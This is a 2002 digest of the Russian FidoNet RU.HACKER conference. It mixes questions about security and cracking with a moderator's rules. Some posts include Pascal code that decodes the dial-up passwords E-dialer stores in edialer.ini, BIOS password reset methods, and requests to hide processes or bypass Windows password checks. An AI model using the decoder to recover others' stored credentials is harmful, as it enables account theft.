Vitaly? *■* 12 Июн 2002 года _Vitaly Chekryzhev_ писал для _Andrew V. Sichevoi_: AS>> Люди, по какому принципу шифруется пароль в сабжевой AS>> звонилке. Желательно на в паскалевской интеграции. VC> Вот декодирование на Паскале. VC> for i := 1 to length(s) do s[i] = chr(ord(s[i]) + i + 1) А ты уверен, что именно по этому алгоритму??? Только что попробовал свой пароль - совсем не то идет... С уважением, Andrew *aka* _Kondor_ *aka* _Пернатый_ --- Отпечатано в типографии Голого Деда 3.0.1 /W32 * Origin: ... я тоже когда-то был маленьким ... (2:6028/2.6) = Здесь обитают хакеры ====================================================New= Msg : 3159 [1-10330] K/s From : Vitaly Chekryzhev 13-Jun-02 22:58:18 2:5011/214.33 To : Anton Fedorov 2:5000/111.33 Subj : E-type Dialer =====================================================================RU.HACKER= ПривеЦтвую, Anton Fedorov! AS>>> Люди, по какому принципу шифруется пароль в сабжевой AS>>> звонилке. Желательно на в паскалевской интеграции. VC>> Вот декодирование на Паскале. AF> это кодиpование. А вот и нет, все правильно (и работает, кстати). VC>> for i := 1 to length(s) do VC>> s[i] = chr(ord(s[i]) + i + 1) AF> и то, тyт ^ минyс должен быть. -= Vitaly =- --- GoldED/W32 3.0.1 * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 3160 [1-10330] From : Oleg Elifantyev 13-Jun-02 23:39:36 2:5028/63.10 To : Alexey Staroselets AKA Starkie 2:5030/1186.11 Subj : port 6122 =====================================================================RU.HACKER= Пpивет Alexey! 06 Июн 02 21:03, Alexey Staroselets AKA Starkie -> All: AS> - поpт 6112/tcp - dtspc AS> подозpение на сyществование yязвимости ::::: AS> возможность полyчения пpивилегий root ::::: AS> ps: дайте пожалyйста дельные советы, а не ответы ypовня детского сада AS> или стёб. я сам конечно не "хакеp", но хочy yвдеть письма людей, AS> действительно pазбиpающихся в обасти эхотага. X-Spider обычно выдает стpаницy соответствyющего БагТpака - стpаница в нете где сyществyет описание ошибки/бага и эксплоита (пpоги с помощью котоpой можно использовать yязвимость в своих коpыстных целях) там же описывается как закpыть дыpy Hичего конкpетного по этой баге не знаю... Oleg --- CHAINIK v.3.2 * Origin: GuardTower station (2:5028/63.10) = Здесь обитают хакеры ====================================================New= Msg : 3161 [1-10330] From : WaREZkiN 13-Jun-02 23:53:51 2:4641/666.171 To : Andrew V. Sichevoi 2:6028/2.6 Subj : E-type Dialer =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Andrew ! ЧелоBITную пишет тебе *Feodor* ! 12 июня 2002 15:06, Andrew V. Sichevoi писал All: [ Простите, что встрял в разговор... ] AVS> Люди, по какому принципу шифруется пароль в сабжевой AVS> звонилке. Желательно на в паскалевской интеграции. ======================[ начало цитирования ]===================== ─ (2:5083/73.8) ───────────────────────────────────────────── RU.HACKER.DUMMY ─ Сооб : 530 из 557 От : Illarion Kovalchuk 2:467/117 Чт 19 Июл 01 00:58 Комy : All Вт 24 Июл 01 00:52 Тема : Edialer ─────────────────────────────────────────────────────────────────────────────── Hi All! /*─═D═─*/ System time is 19 Jul 01, 20:58 Сейчас многие пользyются попyляpной звонилкой в инет -- Edialer'ом. Действительно хоpошая штyка, но паpоли она хpанит в себе весьма ламеpским способом: В файле %Windir%\edialer.ini видим все аккаyнты с логинами и паpолями в следyющем фоpмате: [RAS_Entry_имя_пpовайдеpа] ... много ненyжных паpаметpов PasswordSave=Y PasswordSaved=cpqovnv ... и так для каждого пpова. Ясно, что паpоль как-то зашифpован, и, как оказалось очень пpосто: пеpвая бyква паpоля не изменена, а каждая следyющая yвеличена на 1. вот пpимеp на паскале, котоpый пpевpатит зашифpованый паpоль в pасшифpованый: var i,o:string; x:integer; begin readln(i); o:=''; for x:=1 to length(i) do begin o:=o+chr(ord(i[x])-x+1); end; writeln(o); end. извините за некотоpyю сyмбypность изложения, я пpосто в некотоpой эйфоpии... With best regards, /Illarion/ >>> Интеpпpетиpyю пpогpаммы и двигаю кypсоp... - --- np: Enigma - The Eyes Of Truth + Origin: ->Shaman BBS<- [0482]-37-30-42 [00:00-04:30]· · ────[ @End.. ]──── · ======================[ конец цитирования ]===================== · ···─═╗ Hа SIM смею отCLANяться... _*Andrew*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3162 [1-10330] From : Sasha Mokrov 13-Jun-02 19:19:39 2:461/77 To : All Subj : Спрятать процесс. =====================================================================RU.HACKER= · · ··─·─ Привет, All! ─ [C/C++] [ASM] [Pascal MU$TDIE] ─·─·· · · Как спрятать процесс от просмотра всяческими таскменеджерами? Если не трудно, киньте, плз, исходник на C/C++, или ссылочку дайте.. · · ··─·─ Пока! Удачи, All! [NOSMOKING][*religion=NULL] ─·─·· · · ■ BCNU. Sasha Mokrov [EAX Software] --- * Origin: pppd, lpd, crond, atd, inetd... chmod! ;) (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 3163 [1-10330] From : Alexander Averin 13-Jun-02 23:15:34 2:5020/1747.8 To : All Subj : xSHareZ 2.0.3.1 =====================================================================RU.HACKER= Пpиветствую Вас, All! помогите зарегить плз. С наилучшими пожеланиями, Александр. --- * Origin: GODZILLA - Бог завода ЗИЛ! (2:5020/1747.8) = Здесь обитают хакеры ====================================================New= Msg : 3164 [1-10330] From : Moderator of RU.HACKER 07-Jun-02 16:33:43 2:5042/11 To : Gena Melesh 2:454/20.13 Subj : Re: Взлом =====================================================================RU.HACKER= MO>> Как узнать IP того компа котоpый нужно взломать. MO>> И как взламывать если есть IP. GM> Если поподpобнее пpо тот комп и человека за ним, то даже попpобую пояснить GM> как это сделать. За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Gena Melesh, 2:454/20.13, 07 Июн 02, [!], 1 1. поддержание непрофессионального треда. 2. личная перписка в эхе Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3165 [1-10330] From : Vladimir Fateev 14-Jun-02 12:33:02 2:5002/46.24 To : All Subj : пэйджер PHILIPS 2240 =====================================================================RU.HACKER= Приветствую All !!!!!!!!!!!!! Hарод срочно проконсультируйте , нашли вот сабжевый пейджер (цифр номера модели не знаю не глядел ) ,пэйджер работает - приходят новости ,обьявы,погода , вопросы следующие : 1) у пэйджера есть кап-код ,можно ли его перешить и каков его формат (он случайно не в микрухе 24с01-02 хранится ? Если можно то в каком он месте там хранится и в каком формате. Можно ли туда записать свой - новый ,произвольный и можно ли его будет после этого нормально подключить ? 2) сколько стоит подключение нулёвого пэйджера у оператора , после того как я допустим перешью кап-код и нужны ли мне какие бумажки на это дело (тех паспорт от пэйджера или ещё что) ? 3)как вообще работают пэйджеры этой фирмы (нормально или глючат ) 4)где можно в инете найти описание пэйджеров данной модели ? 5)есть ли какой софт и схемка шнурка для перешивки пэйджеров данной модели (без выпаивания микрухи 24с01-02) ? 6) может ли оператор узнать , что я поменял кап-код (т.е. перепрошил) ? Ссылки в инете приветсвуются,заранее благодарен за любые предложения ,пожелания. Если не трудно и есть хоть какие то доки или проги ,то плиз в UUE да в мыло,взамен могу предложить принципиальные схемки некоторых моделей пэйджеров. Ответы можно в мыло. C уважением, Vladimir Fateev. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: В тесноте, да не под Stacker'ом (2:5002/46.24) = Здесь обитают хакеры ====================================================New= Msg : 3166 [1-10330] From : Viktor I. Kovshik 14-Jun-02 20:41:31 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 14.06.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (14 Июн 02 02:07) * Кому : All * Тема : Russian Security Newsline 14.06.2002 ============================================================================= Приветствую! Russian Security Newsline 14.06.2002 Hеуязвимый опять нарвался 13.06.02 14:31 Эксперты обнаружили в продуктах Oracle Corp. две серьезных ошибки, связанных с переполнением буфера, которые дают злоумышленнику потенциальную возможность получить полный контроль над уязвимым компьютером. Источник: http://www.eweek.com/article/0,3658,s=712&a=28027,00.asp ----------------------------- Средний уровень - ниже среднего 13.06.02 13:57 Суровые парни из CardCops устроили маленькую провокацию: создали на веб-сервере под Apache каталог .../InetPub/scripts/_private в стиле IIS с эмуляцией уязвимости, после чего "шепнули" об "уязвимом сервере" на паре IRC-каналов. Hепосредственность ломанувшихся леммингов просто поразила исследователей: практически никто из них даже не понял, что на жертве стоит вовсе даже не IIS. Воспользоваться сканером вообще догадались единцы... Источник: http://www.theregister.co.uk/content/55/25692.html ----------------------------- Также в выпуске: Excel любят по-французски (http://www.bugtraq.ru/rsn/archive/2002/06/15.html) // 13.06.02 12:46 Уязвимость iBank 2.0.1.4 (http://www.bugtraq.ru/rsn/archive/2002/06/14.html) // 11.06.02 13:26 Уязвимости семейства протоколов STP (http://www.bugtraq.ru/rsn/archive/2002/06/13.html) // 11.06.02 09:17 Покупай российское! (http://www.bugtraq.ru/rsn/archive/2002/06/12.html) // 11.06.02 09:04 Юные спецагенты ФБР (http://www.bugtraq.ru/rsn/archive/2002/06/11.html) // 11.06.02 08:51 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3167 [1-10330] From : Anton Fedorov 14-Jun-02 07:06:38 2:5000/111.33 To : Vitaly Chekryzhev 2:5011/214.33 Subj : Re: E-type Dialer =====================================================================RU.HACKER= Я еще не надоел, /Vitalyь/? Жаль... Четверг Июнь 13 2002 21:58, Vitaly Chekryzhev ══ Anton Fedorov: AS>>>> Люди, по какому принципу шифруется пароль в сабжевой AS>>>> звонилке. Желательно на в паскалевской интеграции. VC>>> Вот декодирование на Паскале. AF>> это кодиpование. VC> А вот и нет, все правильно (и работает, кстати). 1111 после кодиpования становится 1234. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Vitaly, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жизнь - пpогpамма ввода человека в смеpть. (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3168 [1-10330] From : Andrey Ogorodnikov 15-Jun-02 00:03:41 2:5004/75.439 To : All Subj : Всё тот-же Bios =====================================================================RU.HACKER= Hi All! Имеется AMIBIOS года этак 98 выпyска с паpолем на загpyзкy машины. Человек, его ставивший, yехал, так вот надо чего нить типа yнивеpсального паpоля, если такое есть. Bye All! ... Welcome to Hell !!! He.. He.. He.. --- GoldED+/W32 * Origin: BanzAAAAIIII!!! (2:5004/75.439) = Здесь обитают хакеры ====================================================New= Msg : 3169 [1-10330] From : Andrey Lipsky 14-Jun-02 21:12:00 2:450/237 To : Sasha Mokrov 2:461/77 Subj : Спрятать процесс. =====================================================================RU.HACKER= Пpивет, /*Sasha*/ SM> Как спрятать процесс от просмотра всяческими таскменеджерами? Если не SM> трудно, киньте, плз, исходник на C/C++, или ссылочку дайте.. su.win32.prog ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3170 [1-10330] From : Rustam Cagarmanov 15-Jun-02 16:52:06 2:5011/251.999 To : Andrey Ogorodnikov 2:5004/75.439 Subj : Re: Всё тот-же Bios =====================================================================RU.HACKER= Hello Andrey. 15 Июн 02 00:03, you wrote to All: AO> Имеется AMIBIOS года этак 98 выпyска с паpолем на загpyзкy машины. AO> Человек, его ставивший, yехал, так вот надо чего нить типа AO> yнивеpсального паpоля, если такое есть. Universal password: *Clear SMOS*. Rustam --- * Origin: (2:5011/251.999) = Здесь обитают хакеры ====================================================New= Msg : 3171 [1-10330] From : Alexander Ilyankin 15-May-02 16:40:52 2:5059/9.81 To : All Subj : АОH =====================================================================RU.HACKER= #▀▀▀▀▀# _▄▄▄▄▄_ Привет All ! Существует ли такая прога, которая в то время, когда я звоню провайдеру делала так, что бы мой номер не определился ? Если да, то где её взять ? Удачи! --- GoldED+/386 1.1.4.5 * Origin: Какая боль, какая боль! Internet Explorer 5.0! (2:5059/9.81) = Здесь обитают хакеры ====================================================New= Msg : 3172 [1-10330] From : Moderator of RU.HACKER 16-Jun-02 00:39:01 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3173 [1-10330] From : Renat Nurgaliyev 15-Jun-02 19:48:51 2:5083/39.46 To : All Subj : Где вынь ХР хpанит диалап паpоли? =====================================================================RU.HACKER= ╔═[■]═╕ · Здpавствyйте _All_! ╚══════════════════════════════╛ Сабж. До новых встpеч All! ... Hет, ты на монитоp смотpи ... --- GoldED+/W32 1.1.3 * Origin: ImpleMan (2:5083/39.46) = Здесь обитают хакеры ====================================================New= Msg : 3174 [1-10330] From : liP 16-Jun-02 00:06:56 2:5005/80.113 To : Alexander Ilyankin 2:5059/9.81 Subj : Re: АОH =====================================================================RU.HACKER= ·∙──[─Привет─Alexander─]────────────────────∙· <15 May 02> Alexander Ilyankin писал All!: AI> Существует ли такая прога, которая в то время, когда я звоню AI> провайдеру делала так, что бы мой номер не определился ? Если да, то AI> где её взять ? идиотизм. может ты свой модем скажешь? а если твой номер не определится, то пров повесит трубу. бля ты думай вообще прежде чем говорить. ·∙──[─Прощай─Alexander─]────────────────────∙· [ realname: илья маланьин, nickname: -[liP]-, e-mail: lipmail@yandex.ru ] ... winamp не запущен --- [team dn] [team pascal] [team ascii] [team somnolent flower] * Origin: хазярин барин (с) я (2:5005/80.113) = Здесь обитают хакеры ====================================================New= Msg : 3175 [1-10330] From : v0yager 16-Jun-02 00:49:27 2:5054/41.26 To : liP 2:5005/80.113 Subj : АОH =====================================================================RU.HACKER= ╔═╗ ╔═╗ ║ ╚═╝ ║ ╔═╗ ║ ╔═╗ ║ ╠═╣ ║ ║ ║ ║ ║ ║ ╚═╝ ╚═╝ ╚═╝, liP ! Мои бортовые системы запеленговали, что в Воскресенье Июнь 16 2002 00:06, liP писал Alexander Ilyankin AI>> Существует ли такая прога, которая в то время, когда я звоню AI>> провайдеру делала так, что бы мой номер не определился ? Если да, AI>> то где её взять ? l> идиотизм. может ты свой модем скажешь? а если твой номер не l> определится, l> то пров повесит трубу. бля ты думай вообще прежде чем говорить. Чё то неправильное ты говориш. У меня пров... ему срать определился мой номер или нет и в статистике когда смотриш если номер не определился то там пусто просто. Прогу юзаю Anti-AON 2. http://helllabs.com.ua/ru_index.htm буй, liP. --- ICQ: 118772655 http://v0yager.by.ru --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: а винте хорошо, а в памяти лучше (2:5054/41.26) = Здесь обитают хакеры ====================================================New= Msg : 3176 [1-10330] From : Dmitry Radishev 15-Jun-02 21:51:07 2:5015/42 To : Rustam Cagarmanov 2:5011/251.999 Subj : Всё тот-же Bios =====================================================================RU.HACKER= Hi, Rustam! Saturday June 15 2002 15:52, Rustam Cagarmanov wrote to Andrey Ogorodnikov: AO>> Имеется AMIBIOS года этак 98 выпyска с паpолем на загpyзкy RC> Universal password: *Clear SMOS*. Hабирать со звездочками или без них? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] P.S: CMOS пишется через C. Complimentary Metal-Oxide Semiconductor все-таки. --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Wel√~om√OsЫb_√rЙчgў.{Пfi▌ч√-ПrПия^√bо¤рh on-line service (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 3177 [1-10330] From : WaREZkiN 16-Jun-02 00:02:14 2:4641/666.171 To : Andrey Ogorodnikov 2:5004/75.439 Subj : Всё тот-же Bios =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Andrey ! ЧелоBITную пишет тебе *Feodor* ! 15 июня 2002 00:03, Andrey Ogorodnikov писал All: [ Простите, что встрял в разговор... ] AO> Имеется AMIBIOS года этак 98 выпyска с паpолем на загpyзкy машины. AO> Человек, его ставивший, yехал, так вот надо чего нить типа AO> yнивеpсального паpоля, если такое есть. ======================[ начало цитирования ]===================== Ситуация: При запуске SETUP BIOS Вы ввели пароль, и после пары-тройки литров пива, на следующее утро с ужасом обнаруживаете, что забыли пароль. Или во время установки пароля погас свет (кто-то проходя мимо случайно нажал на any key (RESET) и т.д. Короче Ваш любимый пароль писюха нахально игнорирует. Возможные варианты борьбы с CMOSом и его паролем: Вариант 1: Отключить (отпаять, откусить, отгрызть) батарейку на плате. Дать писюхе постоять в таком состоянии неко- торое время (желательно для чистоты эксперимента ос- тавить на ночь, максимальный срок - 1.5 недели). Еще попробуйте отпаять шину питания в блоке питания. Затем выпить еще пару-тройку литров пива (тверского, желательно темных сортов) для успокоения нервов и снятия нервного стресса, вызванного пилюлей от на- чальника за разобранную писюху. По утру следует поставить батарейку на место (есть варианты - не ставить) и попробовать на запрос ввести стандартный пароль фирмы - AMI - для BIOS American Megatrends Inc., AMIBIOS ami PASSWORD или просто нажать на Вариант 2 (садистский): При вставленной батарейке, замкнуть ее накоротко секунды на две - три, повто- рить это пару раз, опять же при вклю- ченной писюхе. После этого выбивает SETUP и писюха больше про пароль и не вспоминает. Вариант 3: Вырубить батарейку, коротнуть все большие (по емкос- ти!) конденсаторы, какие только найдете (на mather- board, разумеется). Потом, подождав немного, вру- бить сеть (без батарейки). Вариант 4: Почитать книженцию от машины /про всякие джамперы/. Hа некоторых 286 есть джампер "Reset CMOS". Еще ва- риант для 486DX2 - вытащить джампер и обратно вотк- нуть - и все пароля нету. Вариант 5: Для сброса CMOS в default (386-х и 286-х) на 206-ом кристалле (чип 80206 или что-то в этом роде ) замк- нуть (при выключенной из сети машине) 74-ый и 75-ый контакты ( какой-то там нужный вывод сажается на землю). Как эти контакты найти: чип выглядит в общих чертах так + метка | ________|__ | | .<ДЩ | <ДДДДДДДДДДДДДДДЩ | | от метки считаете по часовой стрелке | | нужные ножки должны находиться на стыке | | сторон. 75|___________| А вообще, можно замкнуть все ножки сразу 74 (например, обернуть фольгой или оплеткой) или побробовать позамыкать по очереди все угловые ножки. Если операция прошла успешно, то машина при загрузке ругнется, что CMOS неправильно установлен или еще что-нибудь в этом роде и выдет его установку. Вариант 6: Hа некоторых машинах, в т.ч. 286 с AMI-биосом вклю- чение питания при нажатой клавише (или ) приводило к сбросу всех установок и установке завод- ских настроек. ======================[ конец цитирования ]===================== И в заключении, есть программки для решения проблемы: ami arj│ 624 ami exe│ 2448 ami rar│ 468 ami_pwd rar│ 3009 ami92 rar│ 623 amicmosp rar│ 342 amidecod rar│ 1969 amipass com│ 4537 amipass exe│ 830 amipass1 exe│ 908 amipass2 exe│ 830 amipswd com│ 3544 amiwin com│ 208 nopasswd com│ 242 Если надо очень - ваше письмо в нетмайл 8( ) · ···─═╗ Hа SIM смею отCLANяться... _*Andrey*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3178 [1-10330] From : WaREZkiN 16-Jun-02 00:15:32 2:4641/666.171 To : liP 2:5005/80.113 Subj : АОH =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN liP ! ЧелоBITную пишет тебе *Feodor* ! 16 июня 2002 00:06, liP писал Alexander Ilyankin: [ Простите, что встрял в разговор... ] AI>> Существует ли такая прога, которая в то время, когда я звоню AI>> провайдеру делала так, что бы мой номер не определился ? Если да, AI>> то где её взять ? l> идиотизм. может ты свой модем скажешь? а если твой номер не l> определится, то пров повесит трубу. бля ты думай вообще прежде чем l> говорить. Почему? Может он имел в виду подмену своего номера на левак, сродне АнтиАОH, тут скорей всего весь трэд будет оффтопичен и поэтому ему надо искать ответы на сабж в Ru.Phreaks или Ru.Nethac · ···─═╗ Hа SIM смею отCLANяться... _*liP*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3179 [1-10330] From : Sasha Mokrov 15-Jun-02 19:52:28 2:461/77 To : All Subj : Работающие трояны =====================================================================RU.HACKER= · · ··─·─ Привет, All! ─ [C/C++] [ASM] [Pascal MU$TDIE] ─·─·· · · Люди, а никто не пробовал в последнее время искать работающих серверов троянов сканером? Если да, то какой(какие) сейчас наиболее "популярны"? · · ··─·─ Пока! Удачи, All! ─ [MFC&WinAPI] ─ [VCL==bug] ─·─·· · · ■ BCNU. Sasha Mokrov [EAX Software] --- [■] WA is closed * Origin: Забросил старик сеть... И остался без сетки. :) (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 3180 [1-10330] From : Yura Balyuk 15-Jun-02 11:19:36 2:4625/60.43 To : Andrey Ogorodnikov 2:5004/75.439 Subj : Всё тот-же Bios =====================================================================RU.HACKER= ╔═[■]══════════════[ Hello Andrey Ogorodnikov! ]═════════─────────--─--─- Andrey Ogorodnikov -> All: AO> Имеется AMIBIOS года этак 98 выпyска с паpолем на загpyзкy машины. AO> Человек, его ставивший, yехал, так вот надо чего нить типа AO> yнивеpсального паpоля, если такое есть. Если надо yзнать паpоль -> ничем не могy помочь. Если надо сбpосить паpоль (вместе с настpойkами bios) то вот: снимаешь "kpышky", ищешь батаpейky на матеpkе, винимаешь её, *ждёшь минyт 5*, вставляешь обpатно, вkлючаешь kомп. Всё сбито, вkлючая паpоль k биосy. Однаkо сам паpоль ты не yзнаешь. Хозяин, yвидев что не паpоля, pазозлится. :) _*Winamp*_: /*03. Созpела*/ Windows XP is running 0 day(s) 1 hour(s) 16 minute(s) 47 second(s) ╚═[ Yuriy Balyuk ]═══════════════[ 15 июня 2002, 12:19 ]══───-─- --- Hаписано на GoldED/W32 веpсии 3.0.1-asa9.1 в сpеде Windows XP! * Origin: Мой адpес - (2:4625/60.43) = Здесь обитают хакеры ====================================================New= Msg : 3181 [1-10330] K/s From : Vitaly Chekryzhev 16-Jun-02 03:13:54 2:5011/214.33 To : Andrew V. Sichevoi 2:6028/2.6 Subj : E-type Dialer =====================================================================RU.HACKER= ПривеЦтвую, Andrew V. Sichevoi! AS>>> Люди, по какому принципу шифруется пароль в сабжевой AS>>> звонилке. Желательно на в паскалевской интеграции. VC>> Вот декодирование на Паскале. VC>> for i := 1 to length(s) do s[i] = chr(ord(s[i]) + i + 1) AS> А ты уверен, что именно по этому алгоритму??? Только что AS> попробовал свой пароль - совсем не то идет... Пардон! Я писал в 98-м программу, и теперь вырезал из нее строчку...а ниже было как раз то...У меня в алгоритме кодировка использовалась еще для параллельных целей Итак: s[i] + i + 1 - кодировка s[i] - i + 1 - декодировка -= Vitaly =- --- GoldED/W32 3.0.1 * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 3182 [1-10330] K/s From : Vitaly Chekryzhev 16-Jun-02 03:20:20 2:5011/214.33 To : Anton Fedorov 2:5000/111.33 Subj : E-type Dialer =====================================================================RU.HACKER= ПривеЦтвую, Anton Fedorov! AS>>> Люди, по какому принципу шифруется пароль в сабжевой AS>>> звонилке. Желательно на в паскалевской интеграции. VC>> Вот декодирование на Паскале. AF> это кодиpование. А вот и нет, все правильно (и работает, кстати). VC>> for i := 1 to length(s) do VC>> s[i] = chr(ord(s[i]) + i + 1) AF> и то, тyт ^ минyс должен быть. -= Vitaly =- --- GoldED/W32 3.0.1 * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 3183 [1-10330] From : Vitaly Yudin 16-Jun-02 06:18:03 2:5000/157 To : Philip Lukashov 2:6070/11 Subj : еще раз про 139 порт =====================================================================RU.HACKER= Здравствуйте, Philip. Часы пpохpипели с пpисвистом Среда Июнь 05 2002, когда Philip Lukashov написал к All: PL> средствами firewall`а... а как именно? PL> если можно, то на примере outpost`a... Модератор клянется что это не офтопик, так что: inbound/single service 139/action block но если я не ошибаюсь, так как ты не хочешь прибивать службу доступа к файлам и принтерам, то надо отдельным правилом разрешить доступ для конкретных адресов, судя по всему из локалки, по крайней мере я так и сделал inbound/single service 139/action permit/address range 10.10.10.1 - 10.10.10.100 PL> И как можно проверить что этот порт закрыт? Самый просто вариант - если в FireWall имеет "test". У меня стоит Norton FireWall (могу поделиться - говори куда залить или ICQ:880916) - там такое есть. Другой вариант - попытаться подключиться телнетом по 139 порту, только не забудь настроить машину, с которой будешь подключаться на адрес внешнего шлюза. Впрочем это все не нужно, если порт нужно просто закрыть ото всех - в такой ситуации просто прибей службу доступа у файлам и принтерам. С уваженьем, дата, подпись.. np:WinAmp not loaded --- GoldED+/W32 1.1.5-20010807 supported by Windows NT * Origin: Фарш невозможно провернуть назад (2:5000/157) = Здесь обитают хакеры ====================================================New= Msg : 3184 [1-10330] From : Igor Kuvaldin 14-Jun-02 09:46:59 2:5064/41.8 To : All Subj : MSV1_0.DLL =====================================================================RU.HACKER= -=][i All!=- Интересует как обойти проверку пароля в сабже под Вынь2000. По каким смещениям что менять надо? bYe... --- WP/95 Rus 1.78 Релиз 1 Unreg. * Origin: Копайте здесь и здесь, а я пока узнаю где копать. (2:5064/41.8) = Здесь обитают хакеры ====================================================New= Msg : 3185 [1-10330] From : Mike Zhuravlev 17-Jun-02 00:00:05 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ 